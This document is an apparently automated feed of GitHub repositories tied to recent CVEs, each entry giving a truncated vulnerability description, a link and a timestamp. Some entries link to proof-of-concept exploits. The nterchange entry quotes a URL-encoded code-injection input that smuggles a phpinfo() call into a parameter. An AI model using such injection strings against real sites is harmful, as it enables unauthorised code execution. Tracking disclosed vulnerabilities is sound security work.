**The JsonErrorReportValve in Apache Tomcat 8.5.83, 9.0.40 to 9.0.68 and 10.1.0-M1 to 10.1.1 did not escape the type, message or description values. In some circumstances these are constructed from user provided data and it was therefore possible for users to supply values that invalidated or manipulated the JSON output. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45143](https://github.com/Live-Hack-CVE/CVE-2022-45143) create time: 2023-01-03T21:54:21Z

**MyBB before 1.8.33 allows Directory Traversal. The Admin CP Languages module allows remote authenticated users, with high privileges, to achieve local file inclusion and execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-45867](https://github.com/Live-Hack-CVE/CVE-2022-45867) create time: 2023-01-03T21:54:12Z

**ViewVC, a browser interface for CVS and Subversion version control repositories, as a cross-site scripting vulnerability that affects versions prior to 1.2.2 and 1.1.29. The impact of this vulnerability is mitigated by the need for an attacker to have commit privileges to a Subversion repository exposed by an otherwise CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22456](https://github.com/Live-Hack-CVE/CVE-2023-22456) create time: 2023-01-03T21:54:25Z

**CVE-2018-16763 FuelCMS 1.4 Remote Code Execution, this version of FuelCMS is still vulnerable until now** : [not1cyyy/CVE-2018-16763](https://github.com/not1cyyy/CVE-2018-16763) create time: 2023-01-03T20:47:08Z

**MooTools is a collection of JavaScript utilities for JavaScript developers. All known versions include a CSS selector parser that is vulnerable to Regular Expression Denial of Service (ReDoS). An attack requires that an attacker can inject a string into a CSS selector at runtime, which is quite common with e.g. jQuery CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32821](https://github.com/Live-Hack-CVE/CVE-2021-32821) create time: 2023-01-03T19:44:00Z

**Apache Dubbo is a java based, open source RPC framework. Versions prior to 2.6.10 and 2.7.10 are vulnerable to pre-auth remote code execution via arbitrary bean manipulation in the Telnet handler. The Dubbo main service port can be used to access a Telnet Handler which offers some basic methods to collect information a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32824](https://github.com/Live-Hack-CVE/CVE-2021-32824) create time: 2023-01-03T19:43:51Z

**An improper neutralization of CRLF sequences in HTTP headers ('HTTP Response Splitting') vulnerability [CWE-113] In FortiWeb version 7.0.0 through 7.0.2, FortiWeb version 6.4.0 through 6.4.2, FortiWeb version 6.3.6 through 6.3.20 may allow an authenticated and remote attacker to inject arbitrary headers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42471](https://github.com/Live-Hack-CVE/CVE-2022-42471) create time: 2023-01-03T19:44:18Z

**An improper neutralization of input during web page generation vulnerability [CWE-79] in FortiPortal versions 6.0.0 through 6.0.11 and all versions of 5.3, 5.2, 5.1, 5.0 management interface may allow a remote authenticated attacker to perform a stored cross site scripting (XSS) attack via sending request with speciall CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41336](https://github.com/Live-Hack-CVE/CVE-2022-41336) create time: 2023-01-03T19:44:13Z

**A improper neutralization of special elements used in an os command ('os command injection') in Fortinet FortiADC version 7.0.0 through 7.0.2, FortiADC version 6.2.0 through 6.2.3, FortiADC version version 6.1.0 through 6.1.6, FortiADC version 6.0.0 through 6.0.4, FortiADC version 5.4.0 through 5.4.5 may allow an attac CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39947](https://github.com/Live-Hack-CVE/CVE-2022-39947) create time: 2023-01-03T19:44:09Z

**Multiple improper neutralization of special elements used in an OS Command ('OS Command Injection') vulnerabilities [CWE-78] in FortiTester 7.1.0, 7.0 all versions, 4.0.0 through 4.2.0, 2.3.0 through 3.9.1 may allow an authenticated attacker to execute arbitrary commands in the underlying shell. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35845](https://github.com/Live-Hack-CVE/CVE-2022-35845) create time: 2023-01-03T19:44:04Z

**CVE-2022-46689** : [straight-tamago/NoCameraSound](https://github.com/straight-tamago/NoCameraSound) create time: 2022-12-26T00:08:55Z

**User friendly Spring4Shell POC** : [ajith737/Spring4Shell-CVE-2022-22965-POC](https://github.com/ajith737/Spring4Shell-CVE-2022-22965-POC) create time: 2023-01-03T18:15:07Z

**usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28388](https://github.com/Live-Hack-CVE/CVE-2022-28388) create time: 2023-01-03T17:31:22Z

**The remote keyless system on Renault ZOE 2021 vehicles sends 433.92 MHz RF signals from the same Rolling Codes set for each door-open request, which allows for a replay attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38766](https://github.com/Live-Hack-CVE/CVE-2022-38766) create time: 2023-01-03T17:31:08Z

**The User Post Gallery - UPG plugin for WordPress is vulnerable to authorization bypass which leads to remote command execution due to the use of a nopriv AJAX action and user supplied function calls and parameters in versions up to, and including 2.19. This makes it possible for unauthenticated attackers to call arbitr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0039](https://github.com/Live-Hack-CVE/CVE-2023-0039) create time: 2023-01-03T17:31:12Z

**The Members Import plugin for WordPress is vulnerable to Self Cross-Site Scripting via the user_login parameter in an imported CSV file in versions up to, and including, 1.4.2 due to insufficient input sanitization and output escaping. This makes it possible for attackers to inject arbitrary web scripts in pages that e CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4663](https://github.com/Live-Hack-CVE/CVE-2022-4663) create time: 2023-01-03T15:19:23Z

**The "Survey Maker – Best WordPress Survey Plugin" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via survey answers in versions up to, and including, 3.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0038](https://github.com/Live-Hack-CVE/CVE-2023-0038) create time: 2023-01-03T15:19:27Z

**A vulnerability, which was classified as problematic, has been found in ahmyi RivetTracker. This issue affects some unknown processing. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. The attack may be initiated remotely. The name of the patch is f053c5cc2bc44269b0496b5f275e349928a9 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-10003](https://github.com/Live-Hack-CVE/CVE-2012-10003) create time: 2023-01-03T14:14:07Z

**A vulnerability classified as problematic has been found in ethitter WP-Print-Friendly up to 0.5.2. This affects an unknown part of the file wp-print-friendly.php. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. Upgrading to version 0.5.3 is able to address this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-10007](https://github.com/Live-Hack-CVE/CVE-2013-10007) create time: 2023-01-03T14:14:17Z

**A vulnerability classified as problematic was found in ummmmm nflpick-em.com up to 2.2.x. This vulnerability affects the function _Load_Users of the file html/includes/runtime/admin/JSON/LoadUsers.php. The manipulation of the argument sort leads to sql injection. The attack can be initiated remotely. The name of the pa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4871](https://github.com/Live-Hack-CVE/CVE-2022-4871) create time: 2023-01-03T14:14:11Z

**A vulnerability was found in ahmyi RivetTracker. It has been declared as problematic. Affected by this vulnerability is the function changeColor of the file css.php. The manipulation of the argument set_css leads to cross site scripting. The attack can be launched remotely. The name of the patch is 45a0f33876d58cb7e4a0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-10002](https://github.com/Live-Hack-CVE/CVE-2012-10002) create time: 2023-01-03T12:03:53Z

**** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in sumocoders FrameworkUserBundle up to 1.3.x. It has been rated as problematic. Affected by this issue is some unknown functionality of the file Resources/views/Security/login.html.twig. The manipulation leads to information expo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10012](https://github.com/Live-Hack-CVE/CVE-2015-10012) create time: 2023-01-03T12:03:58Z

**In affected versions of Octopus Deploy users of certain browsers using AD to sign-in to Octopus Server were able to bypass authentication checks and be redirected to the configured redirect url without any validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3614](https://github.com/Live-Hack-CVE/CVE-2022-3614) create time: 2023-01-03T06:38:55Z

**Stack-based buffer overflow vulnerability in V-Server v4.0.12.0 and earlier allows a local attacker to obtain the information and/or execute arbitrary code by having a user to open a specially crafted project file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47908](https://github.com/Live-Hack-CVE/CVE-2022-47908) create time: 2023-01-03T06:38:49Z

**Merit LILIN AH55B04 & AH55B08 DVR firm has hard-coded administrator credentials. An unauthenticated remote attacker can use these credentials to log in administrator page, to manipulate system or disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47618](https://github.com/Live-Hack-CVE/CVE-2022-47618) create time: 2023-01-03T06:38:45Z

**Out-of-bounds write vulnerability in V-Server v4.0.12.0 and earlier allows a local attacker to obtain the information and/or execute arbitrary code by having a user to open a specially crafted project file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47317](https://github.com/Live-Hack-CVE/CVE-2022-47317) create time: 2023-01-03T06:38:41Z

**Out-of-bounds read vulnerability in V-SFT v6.1.7.0 and earlier and TELLUS v4.0.12.0 and earlier allows a local attacker to obtain the information and/or execute arbitrary code by having a user to open a specially crafted image file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46360](https://github.com/Live-Hack-CVE/CVE-2022-46360) create time: 2023-01-03T06:38:37Z

**Vitals ESP upload function has a path traversal vulnerability. A remote attacker with general user privilege can exploit this vulnerability to access arbitrary system files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46309](https://github.com/Live-Hack-CVE/CVE-2022-46309) create time: 2023-01-03T06:38:33Z

**ChangingTec ServiSign component has a path traversal vulnerability due to insufficient filtering for special characters in the DLL file path. An unauthenticated remote attacker can host a malicious website for the component user to access, which triggers the component to load malicious DLL files under arbitrary file pa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46306](https://github.com/Live-Hack-CVE/CVE-2022-46306) create time: 2023-01-03T06:38:28Z

**ChangingTec ServiSign component has a path traversal vulnerability. An unauthenticated LAN attacker can exploit this vulnerability to bypass authentication and access arbitrary system files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46305](https://github.com/Live-Hack-CVE/CVE-2022-46305) create time: 2023-01-03T06:38:24Z

**ChangingTec ServiSign component has insufficient filtering for special characters in the connection response parameter. An unauthenticated remote attacker can host a malicious website for the component user to access, which triggers command injection and allows the attacker to execute arbitrary system command to perfor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46304](https://github.com/Live-Hack-CVE/CVE-2022-46304) create time: 2023-01-03T06:38:20Z

**Out-of-bounds write vulnerability in V-SFT v6.1.7.0 and earlier and TELLUS v4.0.12.0 and earlier allows a local attacker to obtain the information and/or execute arbitrary code by having a user to open a specially crafted image file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43448](https://github.com/Live-Hack-CVE/CVE-2022-43448) create time: 2023-01-03T06:38:16Z

**The Administrator function of EasyTest has an Incorrect Authorization vulnerability. A remote attacker authenticated as a general user can exploit this vulnerability to bypass the intended access restrictions, to make API functions calls, manipulate system and terminate service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43438](https://github.com/Live-Hack-CVE/CVE-2022-43438) create time: 2023-01-03T06:38:12Z

**The Download function’s parameter of EasyTest has insufficient validation for user input. A remote attacker authenticated as a general user can inject arbitrary SQL command to access, modify or delete database. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43437](https://github.com/Live-Hack-CVE/CVE-2022-43437) create time: 2023-01-03T06:38:08Z

**The File Upload function of EasyTest has insufficient filtering for special characters and file type. A remote attacker authenticated as a general user can upload and execute arbitrary files, to manipulate system or disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43436](https://github.com/Live-Hack-CVE/CVE-2022-43436) create time: 2023-01-03T06:38:04Z

**Out-of-bounds read vulnerability in V-Server v4.0.12.0 and earlier allows a local attacker to obtain the information and/or execute arbitrary code by having a user to open a specially crafted project file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41645](https://github.com/Live-Hack-CVE/CVE-2022-41645) create time: 2023-01-03T06:38:00Z

**Realtek GPON router has insufficient filtering for special characters. A remote attacker authenticated as an administrator can exploit this vulnerability to perform command injection attacks, to execute arbitrary system command, manipulate system or disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40740](https://github.com/Live-Hack-CVE/CVE-2022-40740) create time: 2023-01-03T06:37:56Z

**aEnrich a+HRD has improper validation for login function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and access API function to perform arbitrary system command or disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39042](https://github.com/Live-Hack-CVE/CVE-2022-39042) create time: 2023-01-03T06:37:51Z

**aEnrich a+HRD has insufficient user input validation for specific API parameter. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete database. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39041](https://github.com/Live-Hack-CVE/CVE-2022-39041) create time: 2023-01-03T06:37:47Z

**aEnrich a+HRD log read function has a path traversal vulnerability. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39040](https://github.com/Live-Hack-CVE/CVE-2022-39040) create time: 2023-01-03T06:37:43Z

**aEnrich’s a+HRD has inadequate filtering for specific URL parameter. An unauthenticated remote attacker can exploit this vulnerability to send arbitrary HTTP(s) request to launch Server-Side Request Forgery (SSRF) attack, to perform arbitrary system command or disrupt service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39039](https://github.com/Live-Hack-CVE/CVE-2022-39039) create time: 2023-01-03T06:37:39Z

**Out-of-bounds write vulnerability in Remote Desktop Functionality in Synology VPN Plus Server before 1.4.3-0534 and 1.4.4-0635 allows remote attackers to execute arbitrary commands via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43931](https://github.com/Live-Hack-CVE/CVE-2022-43931) create time: 2023-01-03T06:37:34Z

**no description** : [Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473](https://github.com/Trinadh465/frameworks_minikin_AOSP10_r33-CVE-2022-20473) create time: 2023-01-03T04:51:12Z

**CVE-2022-46366** : [wh-gov/CVE-2022-46366](https://github.com/wh-gov/CVE-2022-46366) create time: 2023-01-03T04:04:29Z

**no description** : [Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2022-20470) create time: 2023-01-03T03:54:59Z

**CVE-2019–15949 for Nagiosxi < 5.6.6** : [hadrian3689/nagiosxi_5.6.6](https://github.com/hadrian3689/nagiosxi_5.6.6) create time: 2023-01-02T22:41:12Z

**A vulnerability classified as problematic has been found in OpenDNS OpenResolve. This affects an unknown part of the file resolverapi/endpoints.py. The manipulation leads to improper output neutralization for logs. The name of the patch is 9eba6ba5abd89d0e36a008921eb307fcef8c5311. It is recommended to apply a patch to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10011](https://github.com/Live-Hack-CVE/CVE-2015-10011) create time: 2023-01-03T00:05:34Z

**Use after free in FileAPI in Google Chrome prior to 72.0.3626.81 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chrome security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-13768](https://github.com/Live-Hack-CVE/CVE-2019-13768) create time: 2023-01-03T01:11:52Z

**Insufficient policy enforcement in content security policy in Google Chrome prior to 91.0.4472.77 allowed a remote attacker to bypass content security policy via a crafted HTML page. (Chrome security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30558](https://github.com/Live-Hack-CVE/CVE-2021-30558) create time: 2023-01-03T01:12:01Z

**Out of bounds read in WebUI Settings in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chrome security severity: Low) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21200](https://github.com/Live-Hack-CVE/CVE-2021-21200) create time: 2023-01-03T01:11:56Z

**Inappropriate implementation in Paint in Google Chrome prior to 98.0.4758.80 allowed a remote attacker to leak cross-origin data outside an iframe via a crafted HTML page. (Chrome security severity: Low) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4025](https://github.com/Live-Hack-CVE/CVE-2022-4025) create time: 2023-01-03T01:12:30Z

**Use after free in Browser History in Google Chrome prior to 100.0.4896.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chrome security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3863](https://github.com/Live-Hack-CVE/CVE-2022-3863) create time: 2023-01-03T01:12:25Z

**Use after free in Passwords in Google Chrome prior to 105.0.5195.125 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3842](https://github.com/Live-Hack-CVE/CVE-2022-3842) create time: 2023-01-03T01:12:21Z

**Integer overflow in Window Manager in Google Chrome on Chrome OS and Lacros prior to 104.0.5112.79 allowed a remote attacker who convinced a user to engage in specific UI interactions to perform an out of bounds memory write via crafted UI interactions. (Chrome security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2743](https://github.com/Live-Hack-CVE/CVE-2022-2743) create time: 2023-01-03T01:12:17Z

**Use after free in Exosphere in Google Chrome on Chrome OS and Lacros prior to 104.0.5112.79 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via crafted UI interactions. (Chrome security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2742](https://github.com/Live-Hack-CVE/CVE-2022-2742) create time: 2023-01-03T01:12:12Z

**Inappropriate implementation in HTML parser in Google Chrome prior to 99.0.4844.51 allowed a remote attacker to bypass XSS preventions via a crafted HTML page. (Chrome security severity: Medium) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0801](https://github.com/Live-Hack-CVE/CVE-2022-0801) create time: 2023-01-03T01:12:08Z

**Inappropriate implementation in File System API in Google Chrome on Windows prior to 97.0.4692.71 allowed a remote attacker to obtain potentially sensitive information via a crafted HTML page. (Chrome security severity: High) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0337](https://github.com/Live-Hack-CVE/CVE-2022-0337) create time: 2023-01-03T01:12:05Z

**In affected versions of Octopus Deploy it is possible for certain types of sensitive variables to inadvertently become unmasked when viewed in variable preview. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3460](https://github.com/Live-Hack-CVE/CVE-2022-3460) create time: 2023-01-03T01:11:48Z

**The Custom Field Template WordPress plugin before 2.5.8 unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4324](https://github.com/Live-Hack-CVE/CVE-2022-4324) create time: 2023-01-03T00:07:06Z

**The White Label CMS WordPress plugin before 2.5 unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4302](https://github.com/Live-Hack-CVE/CVE-2022-4302) create time: 2023-01-03T00:07:03Z

**The Wholesale Market WordPress plugin before 2.2.1 does not have authorisation check, as well as does not validate user input used to generate system path, allowing unauthenticated attackers to download arbitrary file from the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4298](https://github.com/Live-Hack-CVE/CVE-2022-4298) create time: 2023-01-03T00:06:58Z

**The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users, leading to an unauthenticated SQL injection CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4297](https://github.com/Live-Hack-CVE/CVE-2022-4297) create time: 2023-01-03T00:06:55Z

**The WP-Ban WordPress plugin before 1.69.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4260](https://github.com/Live-Hack-CVE/CVE-2022-4260) create time: 2023-01-03T00:06:51Z

**The All-in-One Addons for Elementor WordPress plugin before 2.4.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4256](https://github.com/Live-Hack-CVE/CVE-2022-4256) create time: 2023-01-03T00:06:48Z

**The Welcart e-Commerce WordPress plugin before 2.8.6 does not validate user input before using it in file_exist() functions via various AJAX actions available to any authenticated users, which could allow users with a role as low as subscriber to perform PHAR deserialisation when they can upload a file and a suitable g CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4237](https://github.com/Live-Hack-CVE/CVE-2022-4237) create time: 2023-01-03T00:06:44Z

**The Welcart e-Commerce WordPress plugin before 2.8.5 does not validate user input before using it to output the content of a file via an AJAX action available to any authenticated users, which could allow users with a role as low as subscriber to read arbitrary files on the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4236](https://github.com/Live-Hack-CVE/CVE-2022-4236) create time: 2023-01-03T00:06:41Z

**The Login with Cognito WordPress plugin through 1.4.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4200](https://github.com/Live-Hack-CVE/CVE-2022-4200) create time: 2023-01-03T00:06:37Z

**The WP Social Sharing WordPress plugin through 2.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4198](https://github.com/Live-Hack-CVE/CVE-2022-4198) create time: 2023-01-03T00:06:33Z

**The WordPress Filter Gallery Plugin WordPress plugin before 0.1.6 does not properly escape the filters passed in the ufg_gallery_filters ajax action before outputting them on the page, allowing a high privileged user such as an administrator to inject HTML or javascript to the plugin settings page, even when the unfilt CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4142](https://github.com/Live-Hack-CVE/CVE-2022-4142) create time: 2023-01-03T00:06:29Z

**The Welcart e-Commerce WordPress plugin before 2.8.5 does not validate user input before using it to output the content of a file, which could allow unauthenticated attacker to read arbitrary files on the server CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4140](https://github.com/Live-Hack-CVE/CVE-2022-4140) create time: 2023-01-03T00:06:25Z

**The Image Optimizer, Resizer and CDN WordPress plugin before 6.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4119](https://github.com/Live-Hack-CVE/CVE-2022-4119) create time: 2023-01-03T00:06:21Z

**The Superio WordPress theme does not sanitise and escape some parameters, which could allow users with a role as low as a subscriber to perform Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4114](https://github.com/Live-Hack-CVE/CVE-2022-4114) create time: 2023-01-03T00:06:16Z

**The Wholesale Market for WooCommerce WordPress plugin before 2.0.0 does not validate user input against path traversal attacks, allowing high privilege users such as admin to download arbitrary logs from the server even when they should not be able to (for example in multisite) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4109](https://github.com/Live-Hack-CVE/CVE-2022-4109) create time: 2023-01-03T00:06:13Z

**The Joy Of Text Lite WordPress plugin before 2.3.1 does not properly sanitise and escape some parameters before using them in SQL statements accessible to unauthenticated users, leading to unauthenticated SQL injection CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4099](https://github.com/Live-Hack-CVE/CVE-2022-4099) create time: 2023-01-03T00:06:09Z

**The Cryptocurrency Widgets Pack WordPress plugin through 1.8.1 does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4059](https://github.com/Live-Hack-CVE/CVE-2022-4059) create time: 2023-01-03T00:06:05Z

**The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4057](https://github.com/Live-Hack-CVE/CVE-2022-4057) create time: 2023-01-03T00:06:01Z

**The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4049](https://github.com/Live-Hack-CVE/CVE-2022-4049) create time: 2023-01-03T00:05:57Z

**The Authenticator WordPress plugin before 1.3.1 does not prevent subscribers from updating a site's feed access token, which may deny other users access to the functionality in certain configurations. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3994](https://github.com/Live-Hack-CVE/CVE-2022-3994) create time: 2023-01-03T00:05:54Z

**The Team Members WordPress plugin before 5.2.1 does not sanitize and escapes some of its settings, which could allow high-privilege users such as editors to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in a multisite setup). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3936](https://github.com/Live-Hack-CVE/CVE-2022-3936) create time: 2023-01-03T00:05:50Z

**The iubenda | All-in-one Compliance for GDPR / CCPA Cookie Consent + more WordPress plugin before 3.3.3 does does not have authorisation and CSRF in an AJAX action, and does not ensure that the options to be updated belong to the plugin as long as they are arrays. As a result, any authenticated users, such as subscribe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3911](https://github.com/Live-Hack-CVE/CVE-2022-3911) create time: 2023-01-03T00:05:45Z

**A vulnerability, which was classified as problematic, has been found in drybjed ansible-ntp. Affected by this issue is some unknown functionality of the file meta/main.yml. The manipulation leads to insufficient control of network message volume. The attack can only be done within the local network. The name of the pat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125036](https://github.com/Live-Hack-CVE/CVE-2014-125036) create time: 2023-01-02T21:55:19Z

**A vulnerability was found in Centralized-Salesforce-Dev-Framework. It has been declared as problematic. Affected by this vulnerability is the function SObjectService of the file src/classes/SObjectService.cls of the component SOQL Handler. The manipulation of the argument orderDirection leads to injection. The name of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-15007](https://github.com/Live-Hack-CVE/CVE-2016-15007) create time: 2023-01-02T21:55:23Z

**kenny2automate is a Discord bot. In the web interface for server settings, form elements were generated with Discord channel IDs as part of input names. Prior to commit a947d7c, no validation was performed to ensure that the channel IDs submitted actually belonged to the server being configured. Thus anyone who has acc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22452](https://github.com/Live-Hack-CVE/CVE-2023-22452) create time: 2023-01-02T21:55:15Z

**A vulnerability has been found in IS_Projecto2 and classified as critical. This vulnerability affects unknown code of the file Cnn-EJB/ejbModule/ejbs/NewsBean.java. The manipulation of the argument date leads to sql injection. The name of the patch is aa128b2c9c9fdcbbf5ecd82c1e92103573017fe0. It is recommended to apply CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125038](https://github.com/Live-Hack-CVE/CVE-2014-125038) create time: 2023-01-02T19:45:02Z

**A vulnerability, which was classified as critical, was found in License to Kill. This affects an unknown part of the file models/injury.rb. The manipulation of the argument name leads to sql injection. The name of the patch is cd11cf174f361c98e9b1b4c281aa7b77f46b5078. It is recommended to apply a patch to fix this issu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125037](https://github.com/Live-Hack-CVE/CVE-2014-125037) create time: 2023-01-02T19:44:58Z

**Vulnerability in the Oracle Database Enterprise Edition Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1 and 19c. Easily exploitable vulnerability allows high privileged attacker having Local Logon privilege with network access via Oracle Net to compromise O CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35576](https://github.com/Live-Hack-CVE/CVE-2021-35576) create time: 2023-01-02T19:45:07Z

**A vulnerability classified as problematic was found in Jobs-Plugin. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. The name of the patch is b8a56718b1d42834c6ec51d9c489c5dc20471d7b. It is recommended to apply a patch to fi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-125035](https://github.com/Live-Hack-CVE/CVE-2014-125035) create time: 2023-01-02T17:34:35Z

**A vulnerability was found in nterchange up to 4.1.0. It has been rated as critical. This issue affects the function getContent of the file app/controllers/code_caller_controller.php. The manipulation of the argument q with the input %5C%27%29;phpinfo%28%29;/* leads to code injection. The exploit has been disclosed to t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-10009](https://github.com/Live-Hack-CVE/CVE-2015-10009) create time: 2023-01-02T17:34:39Z

